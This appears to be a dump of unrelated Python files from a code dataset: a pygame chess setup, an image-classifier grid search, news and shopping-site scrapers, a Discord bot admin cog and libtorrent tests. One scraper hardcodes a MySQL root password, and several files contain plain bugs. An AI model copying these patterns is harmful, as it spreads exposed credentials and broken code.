    \".format(\n tmp_src.source_name,\n tmp_src.date_added.strftime('%b %d, %Y %H:%M:%S'),\n tmp_src.date_modified.strftime('%b %d, %Y %H:%M:%S'),\n )\n \n return message\n","repo_name":"berong91/Meta-data-reader","sub_path":"meta_reader/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18295335950","text":"import pygame\nimport os\nimport time\nimport random\npygame.font.init()\n\nWIDTH, HEIGHT = 720, 720\nWIN = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"Chess - A2\")\n\nLIGHT_SQUARE = pygame.image.load(os.path.join(\"PicsA2\", \"light square.png\"))\nDARK_SQUARE = pygame.image.load(os.path.join(\"PicsA2\", \"dark square.png\"))\n\nLIGHT_PAWN = pygame.image.load(os.path.join(\"PicsA2\", \"light pawn.png\"))\nLIGHT_CASTLE = pygame.image.load(os.path.join(\"PicsA2\", \"light castle.png\"))\nLIGHT_KNIGHT = pygame.image.load(os.path.join(\"PicsA2\", \"light knight.png\"))\nLIGHT_BISHOP = pygame.image.load(os.path.join(\"PicsA2\", \"light bishop.png\"))\nLIGHT_QUEEN = pygame.image.load(os.path.join(\"PicsA2\", \"light queen.png\"))\nLIGHT_KING = pygame.image.load(os.path.join(\"PicsA2\", \"light king.png\"))\n\nDARK_PAWN = pygame.image.load(os.path.join(\"PicsA2\", \"dark pawn.png\"))\nDARK_CASTLE = pygame.image.load(os.path.join(\"PicsA2\", \"dark castle.png\"))\nDARK_KNIGHT = pygame.image.load(os.path.join(\"PicsA2\", \"dark knight.png\"))\nDARK_BISHOP = pygame.image.load(os.path.join(\"PicsA2\", \"dark bishop.png\"))\nDARK_QUEEN = pygame.image.load(os.path.join(\"PicsA2\", \"dark queen.png\"))\nDARK_KING = pygame.image.load(os.path.join(\"PicsA2\", \"dark king.png\"))\n\n\n\n\nclass Pieces:\n def __int__(self,x,y,moves=9):\n self.x = x\n self.y = y\n self.moves = moves\n self.piece_img = None\n \nclass Pawns(Pieces):\n COLOUR_MAP = {\n \"light\": (LIGHT_PAWN),\n \"dark\": (DARK_PAWN)\n }\n def __init__(self, x, y, colour, moves=9):\n super().__init__(x,y,moves)\n self.piece_img = self.COLOUR_MAP(colour)\n\ndef background():\n scale = 90\n for x in range(0,4):\n for y in range (0,4):\n WIN.blit(LIGHT_SQUARE,(2*x*scale,2*y*scale))\n for x in range(1,5):\n for y in range (1,5):\n WIN.blit(LIGHT_SQUARE,(((2*x)-1)*scale,((2*y)-1)*scale))\n for x in range(1,5):\n for y in range (0,4):\n WIN.blit(DARK_SQUARE,((2*x-1)*scale,2*y*scale))\n for x in range(0,4):\n for y in range (1,5):\n WIN.blit(DARK_SQUARE,(2*x*scale,(2*y-1)*scale))\n pygame.display.update()\n \n\n\ndef set_up():\n COLOUR_MAP = {\n \"light\": (LIGHT_PAWN, LIGHT_CASTLE, LIGHT_KNIGHT, LIGHT_BISHOP, LIGHT_QUEEN, LIGHT_KING),\n \"dark\": (DARK_PAWN, DARK_CASTLE, DARK_KNIGHT, DARK_BISHOP, DARK_QUEEN, DARK_KING)\n }\n home_colour = random.choice([\"light\", \"dark\"])\n print(home_colour)\n\n#pawns\n for i in range (0,7):\n piece = Pawns(i*90,7*90, home_colour)\n light_pieces.append(piece)\n\n for piece in light_pieces:\n WIN.blit(self.piece_img, (self.x, self.y))\n\n\ndef main():\n light_pieces = []\n dark_pieces = []\n background()\n set_up()\n\nmain()\n\n \n\n\n\n\n \n\n","repo_name":"VinayPatelGitHub/ChessSimulator","sub_path":"Chess/chess A2.py","file_name":"chess A2.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20719391712","text":"\n# Convenience functions to run a grid search over the classiers and over K in KMeans\n\nimport sift_classifier as bow\nfrom sklearn.cluster import MiniBatchKMeans\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nimport warnings\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nfrom datetime import datetime\n\ndef cluster_and_split(labeled_img_paths, y, K):\n \"\"\"Cluster into K clusters, then split into train/test/val\"\"\"\n # MiniBatchKMeans annoyingly throws tons of deprecation warnings that fill up the notebook. Ignore them.\n warnings.filterwarnings('ignore')\n\n X, cluster_model = bow.cluster_features(\n labeled_img_paths,\n cluster_model=MiniBatchKMeans(n_clusters=K)\n )\n\n warnings.filterwarnings('default')\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n\n return X_train, X_test, y_train, y_test, cluster_model\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n\ndef run_svm(X_train, X_test, y_train, y_test, scoring,\n c_vals=[0.5, 0.8, 1, 3], gamma_vals=[0.1, 0.01, 0.0001, 0.00001]):\n\n param_grid = [\n {'C': c_vals, 'kernel': ['linear']},\n #{'C': c_vals, 'gamma': gamma_vals, 'kernel': ['rbf']},\n ]\n\n print('start training svm', datetime.now())\n\n svc = GridSearchCV(SVC(), param_grid, n_jobs=-1, scoring='accuracy')\n #svc = SVC(C=0.9, kernel='linear')\n svc.fit(X_train, y_train)\n print('train score (%s):'%scoring, svc.score(X_train, y_train))\n test_score = svc.score(X_test, y_test)\n print('test score (%s):'%scoring, test_score)\n y_pred = svc.predict(X_test)\n print('best param for svm', svc.best_params_)\n print('best score for svm', svc.best_score_)\n \n\n mlp = MLPClassifier(hidden_layer_sizes=(10, 2))\n mlp.fit(X_train, y_train)\n print('train score (%s):'%scoring, mlp.score(X_train, y_train))\n test_score_mlp = mlp.score(X_test, y_test)\n print('test score (%s):'%scoring, test_score_mlp)\n \n d = pd.DataFrame([[\"SVM\", test_score*100], [\"MLP\", test_score_mlp*100]],\n columns=[\"Classifier\", 'Accuracy'])\n \n sns.set_color_codes(\"muted\")\n sns.barplot(x='Accuracy', y='Classifier', data=d, color=\"b\")\n\n plt.xlabel('Accuracy %')\n plt.title('Classifier Accuracy')\n plt.show()\n\n\n #print(svc.best_estimator_)\n\n return svc, test_score","repo_name":"vladimir-shirmanov/numbers","sub_path":"sift.py","file_name":"sift.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41640780803","text":"# coding:utf-8\nimport urllib.request, urllib.error\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport time\n\ndef get_sponsor_name(lists, sources):\n for element in lists:\n source = element.find_next(class_=\"sponsor-name\").string\n sources.append(source)\n return sources\n\nurls = ['https://newspicks.com/theme-news/technology/', 'https://newspicks.com/theme-news/business/', 'https://newspicks.com/theme-news/economic/', 'https://newspicks.com/theme-news/market/', 'https://newspicks.com/theme-news/education/', 'https://newspicks.com/theme-news/sports/', 'https://newspicks.com/theme-news/innovation/']\n\nfor url in urls:\n\n html = urllib.request.urlopen(url)\n soup = BeautifulSoup(html, \"html.parser\")\n\n titles = []\n sources = []\n\n page_name = soup.find(class_=\"page-name\").string\n right_box = soup.find_all(class_=\"right-box\")\n if not page_name in ['イノベーション', 'ジョブオファー']:\n for element in right_box:\n title = element.find_next('div').string\n titles.append(title)\n for element in right_box:\n source = element.find_next(class_='meta').find_next('div').string\n sources.append(source)\n\n news_cards = soup.find_all(class_=\"news-card\")\n news_cards_len = len(news_cards)\n for element in news_cards:\n title_link = element.find_next('a')\n title = title_link.find_next(class_=\"title\").string\n titles.append(title)\n\n publisher_containers = soup.find_all(class_=\"publisher-container\")\n containers_len = len(publisher_containers)\n for element in publisher_containers:\n source = element.find_next('span').string\n sources.append(source)\n\n if news_cards_len != containers_len:\n sources = get_sponsor_name(soup.find_all(class_=\"sponsored-container\"), sources)\n\n classes = {'ビジネス': 0, 'キャリア・教育': 1, '金融・マーケット': 2, 'イノベーション': 3, 'ジョブオファー': 4, '政治・経済': 5, '社会・スポーツ': 6, 'テクノロジー': 7}\n\n i = 0\n indexes = []\n themes = []\n for _ in range(len(titles)):\n themes.append(classes[page_name])\n i += 1\n indexes.append(i)\n\n df = pd.DataFrame({'index': indexes,\n 'title': titles,\n 'source': sources,\n 'theme': themes})\n df = df.set_index('index')\n\n file_names = {'テクノロジー': 'technology', 'ビジネス': 'business', '政治・経済': 'politics_economics', '金融・マーケット': 'finance_market', 'キャリア・教育': 'carrier_education', '社会・スポーツ': 'society_sports', 'イノベーション': 'innovation', 'ジョブオファー': 'others'}\n\n csv_name = './datasets/{}.csv'.format(file_names[page_name])\n df_origin = pd.read_csv(csv_name, index_col=0)\n\n df_new = pd.concat([df_origin, df])\n df_new = df_new.drop_duplicates(['title', 'source'])\n df_new = df_new.reset_index(drop=True)\n df_new.to_csv(csv_name, mode=\"w\")\n\n print(\"カテゴリー「{}」終わり\".format(page_name))\n time.sleep(1)\n","repo_name":"MasahiroKitazoe/text_clf","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41015032999","text":"import discord\nfrom discord.ext import commands\nimport os, random\n\n\nclass BotOwner(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(\n name=\"kill\", brief=\"Shuts KaeBot down.\", description=\"Forces Kaebot to shutdown. Only usable by Bot Owner.\"\n )\n async def kill(self, ctx):\n if await self.bot.is_owner(ctx.author):\n await ctx.send(\"KaeBot signing out.\")\n await self.bot.kaedb.close()\n await self.bot.logout()\n else:\n await ctx.send(\"You lack the following permissions to do this:\\n```css\\nBot Owner\\n```\")\n\n @commands.command(\n name=\"restart\", brief=\"Restarts KaeBot.\", description=\"Restarts KaeBot. Only usable by Bot Owner.\"\n )\n async def restart(self, ctx):\n if await self.bot.is_owner(ctx.author):\n await ctx.send(\"Restarting...\")\n # hacky af BUT it works\n os.system(\"py KBRestartHax.py\")\n await self.bot.kaedb.close()\n await self.bot.logout()\n else:\n await ctx.send(\"You lack the following permissions to do this:\\n```css\\nBot Owner\\n```\")\n\n @commands.command(name=\"forceerror\", brief=\"...\", description=\"For testing. Bot Owner only.\", hidden=True)\n async def error(self, ctx):\n if await self.bot.is_owner(ctx.author):\n errortype = random.choice([ValueError(), IndexError(), KeyError(), AttributeError()])\n raise errortype\n else:\n await ctx.send(\"You lack the following permissions to do this:\\n```css\\nBot Owner\\n```\")\n\n @commands.command(name=\"exile\", brief=\"Stop bad users from accessing KaeBot.\",\n description=\"Stop bad users from accessing KaeBot.\")\n async def exile(self, ctx, user: discord.User):\n if await self.bot.is_owner(ctx.author):\n async with self.bot.kaedb.acquire() as conn:\n async with conn.transaction():\n if not await conn.fetchrow(\"SELECT * FROM exiled_users WHERE user_id = $1\", str(user.id)):\n await conn.execute(\"INSERT INTO exiled_users (user_id) VALUES ($1)\", str(user.id))\n await ctx.send(f\"{user.mention} has been exiled...\")\n else:\n await ctx.send(f\"{user.mention} has already been exiled.\")\n else:\n await ctx.send(\"You lack the following permissions to do this:\\n```css\\nBot Owner\\n```\")\n\n @commands.command(name=\"unexile\", brief=\"Allow exiles to use KaeBot again.\",\n description=\"Allow exiled users to use KaeBot again.\")\n async def unexile(self, ctx, user: discord.User):\n if await self.bot.is_owner(ctx.author):\n async with self.bot.kaedb.acquire() as conn:\n async with conn.transaction():\n if await conn.fetchrow(\"SELECT * FROM exiled_users WHERE user_id = $1\", str(user.id)):\n await conn.execute(\"DELETE FROM exiled_users WHERE user_id = $1\", str(user.id))\n await ctx.send(f\"{user.mention} has been welcomed back.\")\n else:\n await ctx.send(\"This user is not exiled.\")\n else:\n await ctx.send(\"You lack the following permissions to do this:\\n```css\\nBot Owner\\n```\")\n\n @commands.command(name=\"exilelist\", brief=\"View all exiled users.\",\n description=\"View all exiled users. Any user can use this command.\")\n async def exilelist(self, ctx):\n embed = discord.Embed(colour=discord.Color.from_rgb(81, 0, 124))\n embed.set_footer(text=self.bot.KAEBOT_VERSION)\n async with self.bot.kaedb.acquire() as conn:\n async with conn.transaction():\n exiles = await conn.fetch(\"SELECT * FROM exiled_users\")\n\n embedcontent = \"\"\n if not exiles:\n embedcontent = \"No exiled users.\"\n else:\n for exile in exiles:\n embedcontent += f\"{self.bot.get_user(int(exile['user_id'])).name}\\n\"\n embed.add_field(name=\"Exiled users:\",\n value=embedcontent,\n inline=False)\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(BotOwner(bot))\n","repo_name":"TSHM-N/KaeBot","sub_path":"cogs/botowner.py","file_name":"botowner.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43342536670","text":"import logging\nimport os.path\n\nfrom tools.utils.progress_utils import ProgressBar\nfrom tools.utils.cid_utils import ParameterData, Nodes, save_xml, get_updated_content\nfrom tools.utils.sql_utils import Connection\n\n\n# @dataclass(init=True, repr=False, eq=False, order=False, frozen=True)\n# class CopyCidOptions:\n# \"\"\"\n# Класс настроек\n# \"\"\"\n# base_path: str\n# source_cid: str\n# target_path: str\n# mask: str\n\n\nclass CopyCid:\n \"\"\"\n Основной класс копирования CID файлов\n \"\"\"\n _base_path: str\n _source_cid_path: str\n _target_path: str\n _mask: str\n\n def __init__(self, base_path: str, source_cid_path: str, target_path: str, mask: str):\n self._base_path = base_path\n self._source_cid_path = source_cid_path\n self._target_path = target_path\n self._mask = mask\n\n def _get_data_from_base(self) -> dict[str, list[tuple[ParameterData, str]]]:\n \"\"\"\n Загрузка данных для генерации из базы\n :return: Словарь со значениями из базы\n \"\"\"\n with Connection.connect_to_mdb(self._base_path) as access_base:\n data: list[dict[str, str]] = access_base.retrieve_data_from_joined_table(\n table_name1='[МЭК 61850]',\n table_name2='[IED]',\n joined_fields=['IED_NAME'],\n fields=['ICD_PATH', 'IP', 'SENSR_TYPE', '[IED].IED_NAME'],\n key_names=None,\n key_values=None,\n uniq_values=True)\n data_for_xml: dict[str, list[tuple[ParameterData, str]]] = {}\n _, file_extension = os.path.splitext(self._source_cid_path)\n for value in data:\n file_name: str = self._target_path + value['ICD_PATH']\n if file_name[-4:].upper() not in ('.CID', '.ICD', 'SCD'):\n file_name = file_name + file_extension\n ip: str = value['IP']\n ied_name: str = value['[IED].IED_NAME']\n sensr_type: str = value['SENSR_TYPE']\n parameters: list[tuple[any, str]] = [(Nodes.IP.value, ip),\n (Nodes.MASK.value, self._mask),\n (Nodes.IEDNAME.value, ied_name),\n (Nodes.DESCR.value, sensr_type)]\n\n data_for_xml[file_name] = parameters\n return data_for_xml\n\n def create_files(self, data_for_xml: dict[str, list[tuple[ParameterData, str]]]) -> None:\n \"\"\"\n Копирование файлов\n :param data_for_xml: Данные из базы со значениями свойств\n :return: None\n \"\"\"\n ProgressBar.config(max_value=len(data_for_xml), step=1, prefix='Копирование файлов', suffix='Завершено')\n for file in data_for_xml:\n data: bytes = get_updated_content(source_file_name=self._source_cid_path,\n parameters=data_for_xml[file])\n save_xml(xml_content=data, target_file_name=file)\n ProgressBar.update_progress()\n\n @staticmethod\n def run(base_path: str, source_cid_path: str, target_path: str, mask: str) -> None:\n logging.info('Запуск скрипта...')\n copy_class: CopyCid = CopyCid(base_path=base_path,\n source_cid_path=source_cid_path,\n target_path=target_path,\n mask=mask)\n\n logging.info('Загрузка данных из базы...')\n data_for_xml: dict[str, list[tuple[ParameterData, str]]] = copy_class._get_data_from_base()\n logging.info('Загрузка завершена.')\n\n logging.info('Запуск копирования файлов...')\n copy_class.create_files(data_for_xml=data_for_xml)\n logging.info('Выполнение завершено.')\n","repo_name":"dgefremov/PyGetTools","sub_path":"tools/copy_cid.py","file_name":"copy_cid.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24586597657","text":"from __future__ import annotations\n\nimport asyncio\nfrom collections.abc import Sequence\nimport os\nimport pathlib\nimport tempfile\nimport unittest\n\nimport libtorrent as lt\n\nfrom tvaf import ltpy\n\nfrom . import lib\nfrom . import request_test_utils\n\n\nclass TestReadPiecesWithCancellation(request_test_utils.RequestServiceTestCase):\n async def test_remove_before_start(self) -> None:\n self.session.remove_torrent(self.handle)\n # Ensure removal happened before we do read_pieces()\n while await asyncio.to_thread(self.session.get_torrents):\n pass\n it = self.service.read_pieces(self.handle, self.all_pieces)\n with self.assertRaises(ltpy.InvalidTorrentHandleError):\n await asyncio.wait_for(it.__anext__(), 60)\n\n async def test_remove_after_start(self) -> None:\n # Schedule removal after we start read_pieces()\n async def do_remove() -> None:\n self.session.remove_torrent(self.handle)\n\n asyncio.create_task(do_remove())\n it = self.service.read_pieces(self.handle, self.all_pieces)\n with self.assertRaises(ltpy.InvalidTorrentHandleError):\n await asyncio.wait_for(it.__anext__(), 60)\n\n async def test_shutdown(self) -> None:\n async def do_close() -> None:\n self.service.close()\n\n asyncio.create_task(do_close())\n it = self.service.read_pieces(self.handle, self.all_pieces)\n with self.assertRaises(asyncio.CancelledError):\n await asyncio.wait_for(it.__anext__(), 60)\n\n async def test_file_error(self) -> None:\n self.session.remove_torrent(self.handle)\n # Create a file in tempdir, try to use it as the save_path\n path = pathlib.Path(self.tempdir.name) / \"file.txt\"\n await asyncio.to_thread(path.write_bytes, b\"\")\n atp = self.torrent.atp()\n atp.save_path = str(path)\n self.handle = await asyncio.to_thread(\n self.session.add_torrent, atp # type: ignore\n )\n await self.feed_pieces()\n\n it = self.service.read_pieces(self.handle, self.all_pieces)\n with self.assertRaises(NotADirectoryError):\n await asyncio.wait_for(it.__anext__(), 60)\n\n # TODO: test de-prioritization\n\n\nclass TestReadPieces(request_test_utils.RequestServiceTestCase):\n async def read(self, pieces: Sequence[int]) -> list[bytes]:\n result: list[bytes] = []\n it = self.service.read_pieces(self.handle, pieces)\n async for piece in it:\n result.append(piece)\n return result\n\n async def test_read_all(self) -> None:\n await self.feed_pieces()\n pieces = await asyncio.wait_for(self.read(self.all_pieces), 60)\n self.assertEqual(pieces, self.torrent.pieces)\n\n async def test_out_of_order(self) -> None:\n await self.feed_pieces()\n pieces = await asyncio.wait_for(self.read([1, 0]), 60)\n self.assertEqual(pieces, [self.torrent.pieces[1], self.torrent.pieces[0]])\n\n async def test_duplicates(self) -> None:\n await self.feed_pieces()\n pieces = await asyncio.wait_for(self.read([0, 0]), 60)\n self.assertEqual(pieces, [self.torrent.pieces[0], self.torrent.pieces[0]])\n\n @unittest.skip(\"flaky\")\n async def test_repetition(self) -> None:\n await self.feed_pieces()\n for _ in range(5):\n pieces = await asyncio.wait_for(self.read(self.all_pieces), 60)\n self.assertEqual(pieces, self.torrent.pieces)\n\n async def test_concurrent(self) -> None:\n task1 = asyncio.create_task(self.read(self.all_pieces))\n task2 = asyncio.create_task(self.read(self.all_pieces))\n await self.feed_pieces()\n pieces_list = await asyncio.wait_for(asyncio.gather(task1, task2), 60)\n for pieces in pieces_list:\n self.assertEqual(pieces, self.torrent.pieces)\n\n async def test_download(self) -> None:\n seed = lib.create_isolated_session_service().session\n seed_dir = await asyncio.to_thread(tempfile.TemporaryDirectory)\n try:\n atp = self.torrent.atp()\n atp.save_path = seed_dir.name\n atp.flags &= ~lt.torrent_flags.paused\n seed_handle = await asyncio.to_thread(seed.add_torrent, atp) # type: ignore\n # https://github.com/arvidn/libtorrent/issues/4980: add_piece()\n # while checking silently fails in libtorrent 1.2.8.\n await lib.wait_done_checking_or_error(seed_handle)\n for i, piece in enumerate(self.torrent.pieces):\n seed_handle.add_piece(i, piece, 0)\n\n self.handle.connect_peer((\"127.0.0.1\", seed.listen_port()))\n\n # The peer connection takes a long time, not sure why\n pieces = await asyncio.wait_for(self.read(self.all_pieces), 60)\n finally:\n await asyncio.to_thread(seed_dir.cleanup)\n self.assertEqual(pieces, self.torrent.pieces)\n\n async def test_read_checked_pieces(self) -> None:\n # write data to disk\n path = pathlib.Path(self.tempdir.name) / os.fsdecode(self.torrent.files[0].path)\n await asyncio.to_thread(path.write_bytes, self.torrent.files[0].data)\n # recheck the torrent\n self.handle.force_recheck()\n\n pieces = await asyncio.wait_for(self.read(self.all_pieces), 60)\n self.assertEqual(pieces, self.torrent.pieces)\n\n async def test_read_after_cancelled_read(self) -> None:\n await self.feed_pieces()\n it = self.service.read_pieces(self.handle, self.all_pieces)\n async for _ in it:\n break\n pieces = await asyncio.wait_for(self.read(self.all_pieces), 60)\n self.assertEqual(pieces, self.torrent.pieces)\n","repo_name":"AllSeeingEyeTolledEweSew/tvaf","sub_path":"tests/test_request.py","file_name":"test_request.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29673586640","text":"import sys\nsys.path.append('/home/cc/ee106b/sp17/class/ee106b-aam/baxter_labs/src/baxter_the_builder/src')\nimport builder\n\nrospy.init_node('test_script')\n\n# Set up gripper\ngripper = baxter_gripper.Gripper('right')\ngripper.calibrate()\n\n# Set up limb\nlimb = baxter_interface.Limb('right')\nbuild = Builder(limb, gripper)\nbuild.stack_bricks('block_0', 'block_1')","repo_name":"henry-smith/baxter-the-builder","sub_path":"scripts/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4446874321","text":"from urllib import request\nfrom email import header\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport pymysql\nimport pyautogui\nfrom http.client import ImproperConnectionState\nfrom urllib.error import URLError, HTTPError\nimport string\nimport time\nimport re\n\n# lists = [\n # \"https://m.ycloset.com/\"\n# # \"https://m.mainbooth.co.kr/\"\n# # \"http://rimrim.co.kr\",\n# # \"https://themedicube.co.kr/\",\n# # \"https://www.andar.co.kr\"\n# ]\n\n\n# STEP 2: MySQL Connection 연결\ncon = pymysql.connect(host='127.0.0.1', user='root', password='fouridiot1234',\n db='Capstone', charset='utf8') # 한글처리 (charset = 'utf8')\n\n# STEP 3: Connection 으로부터 Cursor 생성\ncur = con.cursor()\n\ncur.execute(\"delete from platform_item\")\ncon.commit()\n\nproductName_List = ['h1.-font-ns', 'li.name', 'div.prdnames', 'h1.name', 'h2.info_name','h3.product-name','h2.product_title','h2']\nproductPrice_List = ['#span_product_price_text' , 'li.price']\nproductImg_List = ['.product_image ','.prdImgView', '.imgArea', '.prd-image-list']\n\n# 상품명 Parsing Class명 규칙 찾기\ndef select(name_num, price_num, img_num) :\n global frame\n\n\n # Product Name Class 찾기\n productName = frame.select_one(productName_List[name_num])\n while productName == None:\n name_num += 1\n # 예외 처리 (오류 stop 방지 - None 사용)\n if len(productName_List) <= name_num :\n productName = '예외 상황'\n name_num = 0\n else: productName = frame.select_one(productName_List[name_num])\n\n # Product Price Class 찾기\n productPrice = frame.select_one(productPrice_List[price_num])\n while productPrice == None:\n price_num += 1\n # 예외 처리 (오류 stop 방지 - None 사용)\n if len(productPrice_List) <= price_num :\n productPrice = 'sold out'\n price_num = 10000\n else: productPrice = frame.select_one(productPrice_List[price_num])\n\n # Product Img Class 찾기\n productImg = frame.select_one(productImg_List[img_num])\n while productImg == None:\n img_num += 1\n # 예외 처리 (오류 stop 방지 - None 사용)\n if len(productImg_List) <= img_num :\n productImg = '이미지 없음'\n img_num = 10000\n else: productImg = frame.select_one(productImg_List[img_num])\n \n # 해당 사이트 Class 조합 보여주기\n print(name_num, price_num, img_num)\n return name_num, price_num, img_num\n\ndef inputByUser():\n\n key = pyautogui.prompt(\"key 값을 입력해주세요..(없다면 None을 입력해주세요)\")\n\n if key == \"None\" :\n url = pyautogui.prompt(\"url을 입력해주세요.\")\n \n ##정규화해서 platform이름을 가져오기\n p = re.compile(\"www.\\w+\", re.MULTILINE)\n r = re.compile(\"//\\w+\", re.MULTILINE)\n\n platform_name = \"\"\n if not (p.findall(url)):\n platform_name = \"\".join(r.findall(url))\n platform_name = platform_name[2:]\n if platform_name == 'm':\n p = re.compile(\"m.\\w+\", re.MULTILINE)\n platform_name = \"\".join(p.findall(url))\n platform_name = platform_name[2:]\n\n else:\n platform_name = \"\".join(p.findall(url))\n platform_name = platform_name[4:]\n \n cur.execute(f\"INSERT INTO html_url VALUES('{url}','{platform_name}')\")\n con.commit()\n else:\n header = pyautogui.prompt(\"json header를 입력해주세요..\")\n cur.execute(f\"INSERT INTO platform_input VALUES('{header}', '{key}')\")\n con.commit()\n\ndef pullHtmlList():\n html_url_list = []\n count_html_list = cur.execute(\"SELECT * FROM html_url\")\n con.commit()\n result = cur.fetchall()\n for record in result:\n html_url_list.append(record)\n print(html_url_list[0][0])\n \n htmlParsing(html_url_list, count_html_list)\n\ndef pullJsonList():\n json_url_list = []\n count_json_list = cur.execute(\"SELECT * FROM platform_input\")\n con.commit()\n result = cur.fetchall()\n for record in result:\n print(record)\n json_url_list.append(record)\n print(json_url_list[0][1])\n jsonParsing(json_url_list, count_json_list)\n\n##db에 있는 만큼 arr에 넣기 위해서 필요\n\n# # func1이 실행되면 cafe의 json을 가진 사이트를 파싱\n# def jsonParsing(list, k, app_key) : \n# try:\n# requestdata = requests.get(f\"https://{list}.cafe24api.com/api/v2/products/{k}?shop_no=1&cafe24_app_key={app_key}\")\n# return requestdata\n# except:\n# time.sleep(1)\n# return htmlParsing()\n \n \n# 모든 function이 실행되지 않으면 어쩔 수 없이 html 전체를 파싱해서 값을 가져오기(ex 메디큐브)\n# def htmlParsing(html_url_list, count_html_list) :\n# # list를 일단 1개 받아서 num1으로 main에서 돌리기\n# for i in range(count_html_list):\n# for k in range(180, 205):\n# # 상품 판매 링크 가져오기\n# header = {'User-Agent': 'Chrome/66.0.3359.181'}\n# url_name = html_url_list[i][0]\n# requestdata = requests.get(\n# f\"{url_name}/product/detail.html?product_no={k}\", headers=header)\n\n# # 해당 url 존재 유무 파악\n# if requestdata.status_code == 200:\n# # 파싱\n# html = requestdata.text\n# soup = BeautifulSoup(html, 'html.parser')\n\n# # 원하는 정보 추출\n# name_tag = soup.select_one('.infoArea .prd_name_wrap')\n# if name_tag == None :\n# name_tag = soup.select_one('.infoArea .name')\n\n# if name_tag == None :\n# name_tag = soup.select_one('.xans-product-detail .prdnames')\n\n# if name_tag == None :\n# name_tag = soup.select_one('.xans-product-detail .name')\n\n\n# price_tag = soup.select_one('.infoArea .font_Gilroy')\n# if price_tag == None :\n# price_tag = soup.select_one('.infoArea .price')\n# if price_tag == None :\n# price_tag = soup.select_one('#span_product_price_text')\n\n# if price_tag != None and name_tag != None:\n# name = name_tag.text\n# price = price_tag.text\n# price = re.sub(r'[^0-9]', '', price)\n# # print(price)\n\n# # print('product_name :' + name, price)\n\n# ##정규화해서 platform이름 넣어주기(hlist)\n# cur.execute(f\"INSERT INTO platform_item VALUES('{name}','{price}','{html_url_list[0][i]}')\")\n# con.commit()\nsize_list=[]\ncolor_list=[]\nother_list=[]\n\ndef htmlParsing(html_url_list, count_html_list) :\n #list를 일단 1개 받아서 num1으로 main에서 돌리기\n for i in range(count_html_list):\n #DB에 저장되어 있는 html url 불러오기\n url_name = html_url_list[i][0]\n\n # 사이트마다 num 초기화\n name_num = 0\n price_num = 0\n img_num = 0\n a= None\n global frame\n \n\n # html 규칙 2 (주소/product/detail.html?product_no=(int)&cate_no=(int)&display_group=(int))\n for num1 in range(5300,15000):\n\n # 상품 판매 링크 가져오기\n header = {'User-Agent': 'Chrome/66.0.3359.181'}\n response = requests.get(f\"{url_name}/product/detail.html?product_no={num1}\", headers=header)\n\n # 해당 url 존재 유무 파악\n if response.status_code == 200:\n\n # 파싱\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n \n # 필수 정보 추출 (이미지, 상품명, 가격, 사이즈)\n frame = soup.select_one('html body .xans-element-.xans-product.xans-product-detail')\n\n # frame 안에서 infoarea접근하는 애들있고 , table, tbody, tr(1~2)\n # table = frame.find('table')\n # data = []\n # for tr in table.find_all('tr'):\n # data.append(tr)\n # print(data[0].text)\n # print(data[1].text)\n\n # 판매 중단한 상품 거르기\n if frame != None :\n \n # 우연히 첫 Select 함수 호출 때가 예외 사이트인 경우 (아주 드물게 사용)\n # if a[0] == 10000 or a[1] == 10000 or a[2] == 10000 :\n # a = select(0,0,0)\n\n # Select함수에 한번만 접근하기 위한 if 문\n if a == None:\n print(num1)\n a = select(name_num, price_num, img_num)\n print(a)\n \n if frame.select_one(productName_List[a[0]]) == None:\n name = '등록되지 않은 Class'\n else :\n name = frame.select_one(productName_List[a[0]]).text\n\n # soldout 예외 처리\n if frame.select_one(productPrice_List[a[1]]) == None :\n price = 'sold out'\n else :\n price = frame.select_one(productPrice_List[a[1]]).text\n \n # 예외 상황에도 not Error\n if 